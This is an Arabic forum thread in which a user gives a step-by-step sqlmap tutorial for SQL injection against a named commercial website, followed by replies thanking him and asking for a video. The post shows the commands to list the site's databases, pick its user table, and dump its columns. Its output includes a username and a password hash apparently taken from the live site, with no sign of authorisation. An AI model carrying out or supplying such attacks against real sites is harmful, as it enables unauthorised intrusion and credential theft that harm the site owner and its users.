[دورة التوزيعات الامنية] استغلال ثغرات sql في الباك تراك

[r00t-minat0r]

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك
اسم الأداة :sqlmap
مسار الاداة : /pentest/database/sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن

اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql

كود:

http://www.bcspeakers.com/page.php?id=22

وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع

كود:

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs

النتيجة

كود:

available databases [2]:
[*] information_schema
[*] www-bcspeakerstest

مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل

كود:

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables

والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي

كود:

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns

والنتيجة كالتالي

كود:

+----------+---------------------------+
| Column   | Type                      |
+----------+---------------------------+
| id_user  | int(10) unsigned zerofill |
| password | text                      |
| username | text                      |
+----------+---------------------------+

كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي

كود:

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump

النتيجة

كود:

+--------------+
| username     |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+

كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد

كود:

python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump

سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة

كود:

recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]

تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي

كود:

+----------------------------------+
| password                         |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+

كما ترون تم استخراج البيانات بسرعة كبيرة
اتمنى ان يعجبكم الشرح
وأي استفسار انا جاهز
والسلام عليكم ورحمة الله وبركاته

[halk green]

والله بجد روعة الله يوفقك ، أتمنى المزيد والمزيد من مشاركاتك الرائعة والحصرية

[r00t-minat0r]

والله بجد روعة الله يوفقك ، أتمنى المزيد والمزيد من مشاركاتك الرائعة والحصرية

بارك الله فيك ومشكور على مرورك العطر

[Omar Hack]

بارك الله فيك أخوي العزيز
وزادك الله من علمه

[halk green]

والله مشكور عنجد مجهود رائع

[Ace]

الشرح الفديو بنزلو قريبا ومشكور اخي على الطرح استمر

[djxxjd]

niccccccccce

[djxxjd]

gooooooooooooood

[r00t-minat0r]

بارك الله فيك أخوي العزيز
وزادك الله من علمه

مشكور اخي عمر على مرورك اتمنى ان يكون الشرح ذا فائدة للجميع

الشرح الفديو بنزلو قريبا ومشكور اخي على الطرح استمر

ان شاء الله اخي العزيز مشكور على مرورك منور الموضوع
سوف نضع المزيد من المواضييع في هذا القسم الرائع بأذن الله خلاص انتهى زمان البيفروست وغيره

niccccccccce

مشكور على مرورك اخي الكريم

[Mad Devil]

مشكورررر يالغالي والله ماقصرت

ويا portgas~D~Ace

ممكن الفيديو لو سمحت يعني